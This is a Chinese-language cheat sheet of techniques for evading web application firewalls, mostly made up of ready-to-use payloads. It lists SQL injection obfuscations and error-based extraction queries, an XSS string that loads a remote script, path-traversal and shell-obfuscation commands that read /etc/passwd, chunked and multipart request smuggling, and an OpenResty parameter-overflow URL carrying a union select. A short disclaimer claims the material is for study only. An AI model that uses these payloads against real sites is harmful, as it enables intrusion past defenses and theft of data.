本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
相关文章 & Source & Reference
- ██大学通用型 WAF 不完全绕过(持续非定期更新)
- 技术讨论 | 在 HTTP 协议层面绕过 WAF
- 利用分块传输吊打所有 WAF
- 编写 Burp 分块传输插件绕 WAF
- 输入内容存在危险字符,安全起见,已被本站拦截
- Web Application Firewall (WAF) Evasion Techniques - secjuice™ - Medium
- 浅谈绕过 waf 的数种方法
- 绕过云锁文件读取防护
- TSRC挑战赛:WAF之SQL注入绕过挑战实录
- 简单绕过waf拿下赌博网站 - 利用 JavaScript 转写 php
- 从shiro-550漏洞品阿里云waf规则引擎
- 你的扫描器可以绕过防火墙么?(一)
- CTF中的命令执行绕过
- WAF的识别、检测、绕过原理与实战案例
导图
- WAF绕过思路 png
payload
- devploit/XORpass - 使用XOR编码器绕过 WAF
关键字替换
- AND 等价于
&&
- OR 等价于
||
=
等价于 like+
代替 空格- sleep() 等价于 benchmark()
- mid()substring() 等价于 substr()
最直白的 payload 类似 <script> alert('xss'); </script>
,但是你可以用 <script src=来远程加载脚本,并绕过防护
`?search=naive%22%3E%20%3Cmeta%20name=%22referrer%22%20content=%22never%22%20%3E%20%3Cscript%20src=%22https://cdn.jsdelivr.net/gh/TomAPU/xsstest/test.js%22%3E%3C/script%3E%20%3C!--`
注释符绕过
/**/
与/*!*/
,还可以代替空格select/*@a?v|ddd--n*/xxxxx/*@a?v|ddd--n*/from/*a?v|ddd--n*/xxxx
由于waf解析注释符耗费性能,因此这种方法结合fuzz能找到漏网之鱼- emoji 表情
- -- 与 #
Union 注入时 `union select 1 from 2` 替换成 `union/*fuckyou//*a*//*!select*/1/*fuckyou//*a*//*!from*/2`
order by 测试时直接把空格换成 `/**//**/`
空白符绕过
- 正则表达式空白符: %09,%0a,%0b,%0D,%20
- mysql空白符: %09,0A,%0b,%0D,%20,%0C,%A0,/**/
浮点数词法解析
- select * from xxx where id=8E0union select 1,2,3,4,5,6,7E0from xxxx
- select * from xxx where id=8.0union select 1,2,3,4,5,6,7.0from xxxx
- select * from xxx where id=8\Nunion select 1,2,3,4,5,6,7 \Nfrom xxxx
利用不常用报错函数绕过
- select extractvalue(1,concat(1,user()));
- select updatexml(1,concat(1,user()),1);
- select exp(~(select * from(select user())a));
hpp 方式
HPP 是指 HTTP 参数污染.形如以下形式:?id=1&id=2&id=3
的形式,此种形式在获取 id 值的时候不同的 web 技术获取的值是不一样的.
假设提交的参数即为:
id=1&id=2&id=3
Asp.net + iis:id=1,2,3
Asp + iis:id=1,2,3
Php + apache:id=3
形如 index.php?a=[whitelist]&a=select 1 union select 2
路径限制绕过
比如 WAF 会对访问敏感路径加以限制,但是加上参数可以绕过.
比如想访问 xxx.██.edu.cn/phpmyadmin/
会被拦截,访问 xxx.██.edu.cn/phpmyadmin/?id=1
可以绕过
例如连续两个 ../
会被拦截,可以尝试采用 ./
,例如存在关键词,可以使用 ./
分割,linux 下 ./
会被忽略
payload: .././.././.././.././.././.././.././.././.././.././.././etc/./passwd
linux变量特性
-
利用 * 匹配和 "" 为空白的特性
\l\s -l\a\h ""c""at /""**c""/""""**********""a""d******"" cat /e?c/p?ss?? cat /e??/??ss* l''s {l<s,} {ls,-a} {cat,/etc/passwd} cat</etc/passwd
-
使用空的 shell 变量特性
cat$IFS/etc/passwd cat${IFS}/etc/passwd IFS=,;`cat<<<cat,/etc/passwd` c${fuckwaf}at /e${fuckwaf}tc/${fuckwaf}pass${fuckwaf}wd
-
变量控制
x=$'cat\x09/etc/passwd'&&$x a=f;d=ag;c=l;cat$IFS$a$c$d.php
-
反斜杠
ca\t /etc/passwd
多重编码
- How to hack a company by circumventing its WAF for fun and profit - part 2 - 通过多重编码绕过 iRules 规则
利用 pipline 绕过
-
原理
http 协议是由 tcp 协议封装而来,当浏览器发起一个 http 请求时,浏览器先和服务器建立起连接 tcp 连接,然后发送 http 数据包(即我们用 burpsuite 截获的数据),其中包含了一个 Connection 字段,一般值为 close,apache 等容器根据这个字段决定是保持该tcp连接或是断开.当发送的内容太大,超过一个 http 包容量,需要分多次发送时,值会变成 keep-alive,即本次发起的 http 请求所建立的 tcp 连接不断开,直到所发送内容结束 Connection 为 close 为止.
-
测试
关闭 burp 的 Repeater 的 Content-Length 自动更新,如图所示,点击红圈的 Repeater 在下拉选项中取消 update Content-Length 选中.这一步至关重要!!!
burp 截获 post 提交
id=1 and 1=1
会被 waf,将数据包复制一遍,如图接着修改第一个数据包的数据部分,即将
id=1+and+1%3D1
修改为正常内容id=1
,再将数据包的 Content-Length 的值设置为修改后的id=1
的字符长度即 4,最后将 Connection 字段值设为 keep-alive.提交后如图所示,会返回两个响应包,分别对应两个请求.注意:从结果看,第一个正常数据包返回了正确内容,第二个包含 Payload 的数据包被某狗 waf 拦截,说明两数据包都能到达服务器,在面对其他 waf 时有可能可以绕过.无论如何这仍是一种可学习了解的绕过方法,且可以和接下来的方法进行组合使用绕过.
分块编码传输绕过
-
原理
在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码.这时,post 请求报文中的数据部分需要改为用一系列分块来传输.每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的,也不包括分块数据结尾的,且最后需要用 0 独占一行表示结束.
开启上个实验中已关闭的 content-length 自动更新.给 post 请求包加入 Transfer-Encoding: chunked 后,将数据部分
id=1 and 1=1
进行分块编码(注意长度值必须为十六进制数),每一块里长度值独占一行,数据占一行如图所示.注意:分块编码传输需要将关键字 and,or,select ,union 等关键字拆开编码,不然仍然会被 waf 拦截.编码过程中长度需包括空格的长度.最后用 0 表示编码结束,并在 0 后空两行表示数据包结束,不然点击提交按钮后会看到一直处于 waiting 状态.
利用协议未覆盖进行绕过
-
原理
HTTP 头里的 Content-Type 一般有 application/x-www-form-urlencoded,multipart/form-data,text/plain 三种,其中 multipart/form-data 表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分.所以,当 waf 没有规则匹配该协议传输的数据时可被绕过.
将头部 Content-Type 改为
multipart/form-data; boundary=69
然后设置分割符内的 Content-Disposition 的 name 为要传参数的名称.数据部分则放在分割结束符上一行.由于是正常数据提交,所以从图可知数据是能被 apache 容器正确解析的,尝试
1 and 1=1
也会被某狗 waf 拦截,但如果其他 waf 没有规则拦截这种方式提交的数据包,那么同样能绕过.一般绕waf往往需要多种方式结合使用,示例中,只需将数据部分
1 and 1=1
用一个小数点"."
当作连接符即1.and 1=1
就可以起到绕过作用.当然,这只是用小数点当连接符所起的作用而已.
组合使用
在协议未覆盖的数据包中加入 Transfer-Encoding: chunked ,然后将数据部分全部进行分块编码,如图所示(数据部分为 1 and 1=1
).
注意:第2块,第3块,第7块,和第8块.
第2块中需要满足
长度值
空行
Content-Disposition: name="id"
空行
这种形式,且长度值要将两个空行的长度计算在内(空行长度为2).
第3块,即数据开始部分需满足
长度值
空行
数据
形式,且需将空行计算在内.
第7块即分割边界结束部分,需满足
长度值
空行
分割结束符
空行
形式,且计算空行长度在内.
第8块需满足
0空格
空行
空行
形式.如果不同时满足这四块的形式要求,payload 将不会生效.
使用注释扰乱分块数据包
通过 RFC7230 阅读规范发现分块传输可以在长度标识处加上分号 ";"
作为注释,如:
9;kkkkk
1234567=1
4;ooo=222
2345
0
(两个换行)
性能检测
WAF 在设计的时候都会考虑到性能问题,例如如果是基于数据包的话会考虑检测数据包的包长,如果是基于数据流的话就会考虑检测一条数据流的多少个字节.一般这类算检测的性能,同时为了保证 WAF 的正常运行,往往还会做一个 bypass 设计,在性能如 cpu 高于 80% 或则内存使用率高于如 80% 是时候,会做检测 bypass,以保证设备的正常运行.
现在问题就是检测多长呢?例如我用 HTTP POST 上传一个 2G 的文件,明显不可能 2G 全做检测不但耗 CPU,同时也会耗内存.因此在设计 WAF 的时候可能就会设计一个默认值,有可能是默认多少个字节的流大小,可能是多少个数据包.
设计了一个脚本,不断的向 HTTP POST 添加填充数据,当将填充数据添加到一定数目之后,发现 POST 中的 sql 注入恶意代码没有被检测了.最终达到了 bypass 的目的.
性能负载
一些传统硬件防护设备为了避免在高负载的时候影响用户体验,如延时等等问题,会考虑在高负载的时候 bypass 掉自己的防护功能,等到设备的负载低于门限值的时候又恢复正常工作.
一些高性能的 WAF 可能使用这种方法可能不能 bypass,但是一些软 WAF 使用这种方式还是可以 bypass 的.
例子,将请求并发同时发送多次,多次访问的时候就有几次漏掉了,没有触发 waf 的拦截.
案例
OpenResty uri参数溢出漏洞
OpenResty 通过ngx.req.get_uri_args、ngx.req.get_post_args获取参数,只能获取到前100个参数,当提交第101个参数时,uri参数溢出,无法正确获取到第101个及以后的参数,无法对攻击者提交的攻击语句进行安全检测,导致基于ngx_lua开发的安全防护可被绕过,影响多款基于OpenResty的开源WAF。
127.0.0.1/test?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9& id=1 union select 1,schema_name,3 from INFORMATION_SCHEMA.schemata
通过 ngx.req.get_uri_args、ngx.req.get_post_args 获取 uri 参数,只能获取前 100 个参数,当提交第 101 个参数时,uri 参数溢出,无法正确获取第 100 以后的参数值,基于 ngx_lua 开发的安全防护,无法对攻击者提交的第 100 个以后的参数进行有效安全检测,从而绕过安全防御。
urlencode 和 form-data POST 在提交数据的时候有两种方式,第一种方式是使用 urlencode 的方式提交,第二种方式是使用 form-data 的方式提交.当我们在测试站点的时候,如果发现 POST 提交的数据被过滤掉了,此时可以考虑使用 form-data 的方式去提交.
相关文章